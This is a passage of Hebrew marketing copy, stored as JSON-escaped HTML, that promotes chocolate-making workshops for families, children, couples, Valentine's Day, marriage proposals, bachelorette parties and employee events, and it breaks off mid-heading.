\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd. <br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.\\u00a0<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. <br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd. <br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea 